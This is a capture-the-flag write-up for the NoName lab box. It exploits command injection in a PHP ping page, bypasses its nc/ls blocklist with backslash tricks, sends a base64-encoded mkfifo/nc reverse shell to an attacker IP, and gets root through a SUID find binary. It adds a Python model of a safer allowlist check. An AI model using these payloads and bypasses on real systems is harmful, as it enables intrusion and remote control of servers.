[Offensive Security] Proving Grounds - NoName

https://portal.offensive-security.com/proving-grounds/play https://www.vulnhub.com/entry/haclabs-no_name,429/

NoName may appear easy, but not everything is always straightforward. Only local.txt and proof.txt are valid flags.

Footprinting

Open ports

Nmap SYN scan:

kali@kali:~$ sudo nmap -sS -p- -Pn -v10 -oA syn_full 192.168.207.15
Discovered open port 80/tcp on 192.168.207.15

NSE scan:

kali@kali:~$ sudo nmap -sC -sV -p80 -Pn -v10 -oA nse 192.168.207.15
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)

HTTP

In the main web page, there is a form which requires an IP:

>>>
POST /index.php HTTP/1.1
Host: 192.168.207.15

box=fake+query&submitt=submit

<<<
<h4>Fake Admin Area</h4>
<form action="index.php" method="post">
<input type="text" placeholder="fake query" name="box">
<input type="submit" placeholder="Run" value="submit" name="submitt">
</form>

Fake ping executed

However, that is a fake query box: the IP input is not processed at all. Directory enumeration with ffuf reveals an admin directory:

kali@kali:~$ ffuf -v -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.207.15/FUZZ -t 50 -fc 404,403 -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"http://192.168.207.15/
"http://192.168.207.15/"
"http://192.168.207.15/."
"http://192.168.207.15/admin"
"http://192.168.207.15/index.php"

This directory contains 4 images, with no sensitive information in them or in their metadata:

kali@kali:~$ wget -r http://192.168.207.15/admin
kali@kali:~$ ls ./192.168.207.15
ctf-01.jpg  haclabs.jpeg  new.jpg  Short.png
kali@kali:~$ exiftool ./192.168.207.15/*

Steganographic message

Looking closer at that admin page, a passphrase is hidden at the very bottom of the response!

>>>
GET /admin HTTP/1.1
Host: 192.168.207.15

<<<
<html>
  <body style="background-color:Gainsboro;text-align:center">
  <h3 text-align:center>HacLabs directory of gallery.</h3>
    <img src="new.jpg" height="200" width="200">
    <br>
    <img src="ctf-01.jpg" height="200" width="200">
    <br>
    <img src="haclabs.jpeg" height="200" width="200">
    <br>
    <img src="Short.png" height="200" width="200">
  </body>
</html>


[...]


<!--passphrase:harder-->

But what can I do with that passphrase? Is there a hidden file in one of the images?

kali@kali:~$ steghide extract -sf haclabs.jpeg
Enter passphrase:
wrote extracted data to "imp.txt".

Yup!

kali@kali:~$ cat imp.txt
c3VwZXJhZG1pbi5waHA=

kali@kali:~$ base64 -d imp.txt
superadmin.php

This superadmin.php contains a ping feature (which is real this time!):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=127.0.0.1&submitt=Submit+Query

<<<
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2030ms
rtt min/avg/max/mdev = 0.015/0.023/0.029/0.008 ms

OS Command Injection

This output matches a plain ping -c 3 run from a standard shell, which suggests the input is passed straight to a shell command:

kali@kali:~$ ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.013 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.060 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2036ms
rtt min/avg/max/mdev = 0.013/0.037/0.060/0.019 ms

I immediately found a blind command injection using the pipe symbol:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=|sleep+10&submitt=Submit+Query

<<<
[10,452millis]

Note that the injection doesn't need to be blind, as the output is returned in the response:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=|id&submitt=Submit+Query

<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)

This confirms that the query form in index.php was a rabbit hole, as the user's input isn't processed at all:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0acat+index.php&submitt=Submit+Query

<<<
<?php
  if (isset($_POST['submitt']))
  {
    echo "Fake ping executed";
  }
?>

But we can't get a reverse shell as easily, since some patterns are filtered, such as nc or & (URL-encoded as %26):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0asleep+2%26&submitt=Submit+Query

<<<
[14millis]

Note that a Line Feed (\n, URL-encoded as %0a) can also be used to inject the next command.

Here, the injected command was not executed, as the response came back in less than 2 seconds (0.014 s). In fact, the source code shows that the filtered patterns are those of the PHP array(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"):

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0acat+superadmin.php&submitt=Submit+Query

<<<
<?php
   if (isset($_POST['submitt']))
{
       $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd");
       $pinged=$_POST['pinger'];
       $newStr = str_replace($word, "", $pinged);
       if(strcmp($pinged, $newStr) == 0)
        {
            $flag=1;
        }
       else
        {
           $flag=0;
        }
}

if ($flag==1){
$outer=shell_exec("ping -c 3 $pinged");
echo "<pre>$outer</pre>";
}
?>

Getting a reverse shell with nc is tougher than it sounds, but some bypasses exist! Since the filter is a plain substring blocklist, a backslash inside the word is enough: ls becomes l\s, which the filter no longer matches but which the shell still reads as ls:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0al\s%0a&submitt=Submit+Query

<<<
Short.png
admin
ctf-01.jpg
haclabs.jpeg
index.php
new.jpg
superadmin.php

Likewise, nc can be obfuscated as n\c to bypass the filter:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0ash|n\c++192.168.49.207+48590&submitt=Submit+Query

<<<
$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38142

Arf! The connection comes back, but no command is executed...

$ nc -nvlp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38144
id
ls
whoami
echo plz

After lots of trial and error, I realized the following payload worked (the base64 encoding keeps every filtered pattern, including the slashes in /tmp/f, out of the submitted value):

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.207 48590 >/tmp/f' |base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu
NDkuMjA3IDQ4NTkwID4vdG1wL2YK

Note that the base64-encoded command contains a newline, which must be URL-encoded as %0a:

>>>
POST /superadmin.php HTTP/1.1
Host: 192.168.207.15

pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query

<<<
$ nc -nlvp 48590
listening on [any] 48590 ...
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.15] 38194
sh: 0: can't access tty; job control turned off
$ whoami
www-data

A one-liner reverse shell could be:

$ curl -X POST -d "pinger=%0aecho 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjgu%0aNDkuMjA3IDQ4NTkwID4vdG1wL2YK'|base64 -d|sh&submitt=Submit+Query" http://192.168.207.15/superadmin.php
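As an added example (not code from the write-up or from the NoName box), here is a Python model of the check in superadmin.php: it reproduces the str_replace blocklist, shows why the backslash-quoted words above get through it, and contrasts it with the allowlist validation (IP address only, passed as an argv element rather than a shell string) that would have closed the injection. The payload strings are the write-up's own, URL-decoded.

```python
import ipaddress
import shlex

# Blocklist copied from the page's superadmin.php ($word array).
BLOCKLIST = [";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"]

def blocklist_allows(pinger: str) -> bool:
    """Model of the page's check: PHP str_replace() strips each blocked
    substring in turn; the request is accepted only if nothing was removed
    (strcmp($pinged, $newStr) == 0)."""
    stripped = pinger
    for word in BLOCKLIST:
        stripped = stripped.replace(word, "")
    return stripped == pinger

def shell_sees(token: str) -> str:
    """The word sh actually runs for a backslash-quoted token: shlex follows
    POSIX quoting, so the backslash is dropped and the blocked word is back."""
    return shlex.split(token)[0]

def allowlist_allows(pinger: str) -> bool:
    """Hardened check: accept only a syntactically valid IP address, so no
    metacharacter or newline ever reaches a shell."""
    try:
        ipaddress.ip_address(pinger)
    except ValueError:
        return False
    return True

def safe_ping_argv(pinger: str) -> list:
    """Safe invocation: the validated value becomes one argv element for
    subprocess.run(argv) with shell=False, never part of a command string."""
    if not allowlist_allows(pinger):
        raise ValueError("pinger is not an IP address")
    return ["ping", "-c", "3", pinger]

# Constructed inputs: the write-up's payloads, URL-decoded (%0a -> "\n").
PAYLOADS = {
    "benign": "127.0.0.1",
    "pipe id": "|id",
    "sleep amp": "\nsleep 2&",                  # stopped: contains "&"
    "ls": "\nls\n",                             # stopped: contains "ls"
    "l\\s": "\nl\\s\n",                         # passes: sh unquotes l\s to ls
    "n\\c": "\nsh|n\\c  192.168.49.207 48590",  # passes: same trick for nc
}

if __name__ == "__main__":
    for name, p in PAYLOADS.items():
        print(f"{name:10} blocklist={blocklist_allows(p)!s:5} allowlist={allowlist_allows(p)}")
```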

Local privilege escalation

local.txt

The users are:

$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash
yash:x:1001:1001:,,,:/home/yash:/bin/bash

The first flag is in yash's directory:

$ cd /home/yash

$ ls
flag1.txt
local.txt

$ cat *
Due to some security issues,I have saved haclabs password in a hidden file.

95[...]e6

proof.txt

Given the hint in flag1.txt, let's search for haclabs's password:

Due to some security issues,I have saved haclabs password in a hidden file.

Well, nothing interesting in his home folder:

$ cd /home/haclabs

$ ls -la
total 80
drwxr-xr-x 16 haclabs haclabs 4096 Mar 16  2020 .
drwxr-xr-x  4 root    root    4096 Jan 27  2020 ..
-rw-------  1 haclabs haclabs 2576 Jan 30  2020 .ICEauthority
-rw-r--r--  1 root    root       0 Mar 16  2020 .bash_history
-rw-r--r--  1 haclabs haclabs 3771 Jan 27  2020 .bashrc
drwx------ 13 haclabs haclabs 4096 Feb  9  2020 .cache
drwx------ 11 haclabs haclabs 4096 Jan 27  2020 .config
drwx------  3 haclabs haclabs 4096 Jan 27  2020 .gnupg
drwx------  3 haclabs haclabs 4096 Jan 27  2020 .local
drwx------  5 haclabs haclabs 4096 Jan 27  2020 .mozilla
-rw-r--r--  1 haclabs haclabs  807 Jan 27  2020 .profile
drwx------  2 haclabs haclabs 4096 Jan 27  2020 .ssh
-rw-r--r--  1 haclabs haclabs    0 Jan 27  2020 .sudo_as_admin_successful
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Desktop
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Documents
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Downloads
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Music
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Pictures
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Public
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Templates
drwxr-xr-x  2 haclabs haclabs 4096 Jan 27  2020 Videos
-rw-r--r--  1 root    root     152 Jan 30  2020 flag2.txt

Is there anything interesting in flag2.txt?

$ cat flag2.txt
I am flag2


Nope :/ Using linpeas, I realized that searching for haclabs's password was a rabbit hole. Indeed, I forgot to look for root SUID binaries!

                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid

-rwsr-xr-x 1 root root 233K Nov  5  2017 /usr/bin/find

Exploiting that SUID find binary (sh -p keeps the effective UID instead of dropping it), we get a root shell and the root flag:

$ find . -exec /bin/sh -p \; -quit

$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

$ ls /root
flag3.txt
proof.txt

$ cat /root/*
Your flag is in another file...
41[...]51
